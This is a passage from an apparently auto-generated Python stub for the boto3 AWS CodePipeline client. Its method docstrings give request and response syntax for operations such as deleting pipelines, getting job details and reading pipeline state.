Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **stages** *(list) --*
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --*
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --*
Reserved for future use.
- **type** *(string) --*
Reserved for future use.
- **actions** *(list) --*
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --*
The action declaration's name.
- **actionTypeId** *(dict) --*
The configuration information for the action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration's configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --*
The name of the output of an artifact, such as "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --*
The name of the artifact to be worked on, for example, "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration's AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:type pipeline: dict
:param pipeline: **[REQUIRED]**
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --* **[REQUIRED]**
The name of the action to be performed.
- **roleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **stages** *(list) --* **[REQUIRED]**
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --* **[REQUIRED]**
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --* **[REQUIRED]**
Reserved for future use.
- **type** *(string) --* **[REQUIRED]**
Reserved for future use.
- **actions** *(list) --* **[REQUIRED]**
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --* **[REQUIRED]**
The action declaration\'s name.
- **actionTypeId** *(dict) --* **[REQUIRED]**
The configuration information for the action type.
- **category** *(string) --* **[REQUIRED]**
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --* **[REQUIRED]**
The creator of the action being called.
- **provider** *(string) --* **[REQUIRED]**
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --* **[REQUIRED]**
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration\'s configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --* **[REQUIRED]**
The name of the output of an artifact, such as \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --* **[REQUIRED]**
The name of the artifact to be worked on, for example, \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration\'s AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:rtype: dict
:returns:
"""
pass
def delete_custom_action_type(self, category: str, provider: str, version: str):
"""
Marks a custom action as deleted. PollForJobs for the custom action will fail after the action is marked for deletion. Only used for custom actions.
.. warning::
To re-create a custom action after it has been deleted you must use a string in the version field that has never been used before. This string can be an incremented version number, for example. To restore a deleted custom action, use a JSON file that is identical to the deleted action, including the original string in the version field.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeleteCustomActionType>`_
**Request Syntax**
::
response = client.delete_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string'
)
:type category: string
:param category: **[REQUIRED]**
The category of the custom action that you want to delete, such as source or deploy.
:type provider: string
:param provider: **[REQUIRED]**
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: **[REQUIRED]**
The version of the custom action to delete.
:returns: None
"""
pass
def delete_pipeline(self, name: str):
"""
Deletes the specified pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeletePipeline>`_
**Request Syntax**
::
response = client.delete_pipeline(
name='string'
)
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline to be deleted.
:returns: None
"""
pass
def delete_webhook(self, name: str) -> Dict:
"""
Deletes a previously created webhook by name. Deleting the webhook stops AWS CodePipeline from starting a pipeline every time an external event occurs. The API will return successfully when trying to delete a webhook that is already deleted. If a deleted webhook is re-created by calling PutWebhook with the same name, it will have a different URL.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeleteWebhook>`_
**Request Syntax**
::
response = client.delete_webhook(
name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type name: string
:param name: **[REQUIRED]**
The name of the webhook you want to delete.
:rtype: dict
:returns:
"""
pass
def deregister_webhook_with_third_party(self, webhookName: str = None) -> Dict:
"""
Removes the connection between the webhook that was created by CodePipeline and the external tool with events to be detected. Currently only supported for webhooks that target an action type of GitHub.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeregisterWebhookWithThirdParty>`_
**Request Syntax**
::
response = client.deregister_webhook_with_third_party(
webhookName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type webhookName: string
:param webhookName:
The name of the webhook you want to deregister.
:rtype: dict
:returns:
"""
pass
def disable_stage_transition(self, pipelineName: str, stageName: str, transitionType: str, reason: str):
"""
Prevents artifacts in a pipeline from transitioning to the next stage in the pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DisableStageTransition>`_
**Request Syntax**
::
response = client.disable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound',
reason='string'
)
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline in which you want to disable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage where you want to disable the inbound or outbound transition of artifacts.
:type transitionType: string
:param transitionType: **[REQUIRED]**
Specifies whether artifacts will be prevented from transitioning into the stage and being processed by the actions in that stage (inbound), or prevented from transitioning from the stage after they have been processed by the actions in that stage (outbound).
:type reason: string
:param reason: **[REQUIRED]**
The reason given to the user why a stage is disabled, such as waiting for manual approval or manual tests. This message is displayed in the pipeline console UI.
:returns: None
"""
pass
def enable_stage_transition(self, pipelineName: str, stageName: str, transitionType: str):
"""
Enables artifacts in a pipeline to transition to a stage in a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/EnableStageTransition>`_
**Request Syntax**
::
response = client.enable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound'
)
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline in which you want to enable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage where you want to enable the transition of artifacts, either into the stage (inbound) or from that stage to the next stage (outbound).
:type transitionType: string
:param transitionType: **[REQUIRED]**
Specifies whether artifacts will be allowed to enter the stage and be processed by the actions in that stage (inbound) or whether already-processed artifacts will be allowed to transition to the next stage (outbound).
:returns: None
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_job_details(self, jobId: str) -> Dict:
"""
Returns information about a job. Only used for custom actions.
.. warning::
When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts. Additionally, this API returns any secret values defined for the action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetJobDetails>`_
**Request Syntax**
::
response = client.get_job_details(
jobId='string'
)
**Response Syntax**
::
{
'jobDetails': {
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string',
'actionExecutionId': 'string'
},
'pipelineArn': 'string',
'pipelineExecutionId': 'string'
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'accountId': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetJobDetails action.
- **jobDetails** *(dict) --*
The details of the job.
.. note::
If AWSSessionCredentials is used, a long-running job can call GetJobDetails again to obtain new credentials.
- **id** *(string) --*
The unique system-generated ID of the job.
- **data** *(dict) --*
Represents additional information about a job required for a job worker to complete the job.
- **actionTypeId** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **actionConfiguration** *(dict) --*
Represents information about an action configuration.
- **configuration** *(dict) --*
The configuration data for the action.
- *(string) --*
- *(string) --*
- **pipelineContext** *(dict) --*
Represents information about a pipeline to a job worker.
.. note::
Includes ``pipelineArn`` and ``pipelineExecutionId`` for Custom jobs.
- **pipelineName** *(string) --*
The name of the pipeline. This is a user-specified value. Pipeline names must be unique across all pipeline names under an Amazon Web Services account.
- **stage** *(dict) --*
The stage of the pipeline.
- **name** *(string) --*
The name of the stage.
- **action** *(dict) --*
The context of an action to a job worker within the stage of a pipeline.
- **name** *(string) --*
The name of the action within the context of a job.
- **actionExecutionId** *(string) --*
The system-generated unique ID that corresponds to an action's execution.
- **pipelineArn** *(string) --*
The pipeline execution ID provided to the job worker.
- **pipelineExecutionId** *(string) --*
The pipeline Amazon Resource Name (ARN) provided to the job worker.
- **inputArtifacts** *(list) --*
The artifact supplied to the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **outputArtifacts** *(list) --*
The output of the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **artifactCredentials** *(dict) --*
Represents an AWS session credentials object. These credentials are temporary credentials that are issued by AWS Secure Token Service (STS). They can be used to access input and output artifacts in the Amazon S3 bucket used to store artifact for the pipeline in AWS CodePipeline.
- **accessKeyId** *(string) --*
The access key for the session.
- **secretAccessKey** *(string) --*
The secret access key for the session.
- **sessionToken** *(string) --*
The token for the session.
- **continuationToken** *(string) --*
A system-generated token, such as a AWS CodeDeploy deployment ID, that a job requires in order to continue the job asynchronously.
- **encryptionKey** *(dict) --*
Represents information about the key used to encrypt data in the artifact store, such as an AWS Key Management Service (AWS KMS) key.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **accountId** *(string) --*
The AWS account ID associated with the job.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID for the job.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_pipeline(self, name: str, version: int = None) -> Dict:
"""
Returns the metadata, structure, stages, and actions of a pipeline. Can be used to return the entire structure of a pipeline in JSON format, which can then be modified and used to update the pipeline structure with UpdatePipeline .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipeline>`_
**Request Syntax**
::
response = client.get_pipeline(
name='string',
version=123
)
**Response Syntax**
::
{
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
},
'metadata': {
'pipelineArn': 'string',
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetPipeline action.
- **pipeline** *(dict) --*
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --*
The name of the action to be performed.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **stages** *(list) --*
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --*
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --*
Reserved for future use.
- **type** *(string) --*
Reserved for future use.
- **actions** *(list) --*
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --*
The action declaration's name.
- **actionTypeId** *(dict) --*
The configuration information for the action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration's configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --*
The name of the output of an artifact, such as "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --*
The name of the artifact to be worked on, for example, "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration's AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
- **metadata** *(dict) --*
Represents the pipeline metadata information returned as part of the output of a GetPipeline action.
- **pipelineArn** *(string) --*
The Amazon Resource Name (ARN) of the pipeline.
- **created** *(datetime) --*
The date and time the pipeline was created, in timestamp format.
- **updated** *(datetime) --*
The date and time the pipeline was last updated, in timestamp format.
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline for which you want to get information. Pipeline names must be unique under an Amazon Web Services (AWS) user account.
:type version: integer
:param version:
The version number of the pipeline. If you do not specify a version, defaults to the most current version.
:rtype: dict
:returns:
"""
pass
def get_pipeline_execution(self, pipelineName: str, pipelineExecutionId: str) -> Dict:
"""
Returns information about an execution of a pipeline, including details about artifacts, the pipeline execution ID, and the name, version, and status of the pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipelineExecution>`_
**Request Syntax**
::
response = client.get_pipeline_execution(
pipelineName='string',
pipelineExecutionId='string'
)
**Response Syntax**
::
{
'pipelineExecution': {
'pipelineName': 'string',
'pipelineVersion': 123,
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Succeeded'|'Superseded'|'Failed',
'artifactRevisions': [
{
'name': 'string',
'revisionId': 'string',
'revisionChangeIdentifier': 'string',
'revisionSummary': 'string',
'created': datetime(2015, 1, 1),
'revisionUrl': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetPipelineExecution action.
- **pipelineExecution** *(dict) --*
Represents information about the execution of a pipeline.
- **pipelineName** *(string) --*
The name of the pipeline that was executed.
- **pipelineVersion** *(integer) --*
The version number of the pipeline that was executed.
- **pipelineExecutionId** *(string) --*
The ID of the pipeline execution.
- **status** *(string) --*
The status of the pipeline execution.
* InProgress: The pipeline execution is currently running.
* Succeeded: The pipeline execution was completed successfully.
* Superseded: While this pipeline execution was waiting for the next stage to be completed, a newer pipeline execution advanced and continued through the pipeline instead.
* Failed: The pipeline execution was not completed successfully.
- **artifactRevisions** *(list) --*
A list of ArtifactRevision objects included in a pipeline execution.
- *(dict) --*
Represents revision details of an artifact.
- **name** *(string) --*
The name of an artifact. This name might be system-generated, such as "MyApp", or might be defined by the user when an action is created.
- **revisionId** *(string) --*
The revision ID of the artifact.
- **revisionChangeIdentifier** *(string) --*
An additional identifier for a revision, such as a commit date or, for artifacts stored in Amazon S3 buckets, the ETag value.
- **revisionSummary** *(string) --*
Summary information about the most recent revision of the artifact. For GitHub and AWS CodeCommit repositories, the commit message. For Amazon S3 buckets or actions, the user-provided content of a ``codepipeline-artifact-revision-summary`` key specified in the object metadata.
- **created** *(datetime) --*
The date and time when the most recent revision of the artifact was created, in timestamp format.
- **revisionUrl** *(string) --*
The commit ID for the artifact revision. For artifacts stored in GitHub or AWS CodeCommit repositories, the commit ID is linked to a commit details page.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline about which you want to get execution details.
:type pipelineExecutionId: string
:param pipelineExecutionId: **[REQUIRED]**
The ID of the pipeline execution about which you want to get execution details.
:rtype: dict
:returns:
"""
pass
def get_pipeline_state(self, name: str) -> Dict:
    """
    Return information about the state of a pipeline, including its stages and actions.

    .. note::
        Values returned in the ``revisionId`` and ``revisionUrl`` fields indicate the
        source revision information, such as the commit ID, for the current state.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipelineState>`_

    **Request Syntax**
    ::
        response = client.get_pipeline_state(
            name='string'
        )

    **Response Structure**
    The response is a dict representing the output of a GetPipelineState action:

    - ``pipelineName`` *(string)* -- The name of the pipeline whose state was requested.
    - ``pipelineVersion`` *(integer)* -- The version number of the pipeline.
      A newly-created pipeline is always assigned a version number of ``1``.
    - ``stageStates`` *(list)* -- Per-stage output information. Each entry contains:
      - ``stageName`` *(string)* -- The name of the stage.
      - ``inboundTransitionState`` *(dict)* -- Whether the inbound transition is
        ``enabled``, plus ``lastChangedBy``, ``lastChangedAt`` and ``disabledReason``.
      - ``actionStates`` *(list)* -- The state of each action in the stage:
        ``actionName``, ``currentRevision`` (``revisionId``, ``revisionChangeId``,
        ``created``), ``latestExecution`` (``status`` of
        ``'InProgress'|'Succeeded'|'Failed'``, ``summary``, ``lastStatusChange``,
        approval ``token``, ``lastUpdatedBy``, ``externalExecutionId``,
        ``externalExecutionUrl``, ``percentComplete`` and ``errorDetails`` with
        ``code``/``message``), plus ``entityUrl`` and ``revisionUrl`` deep links.
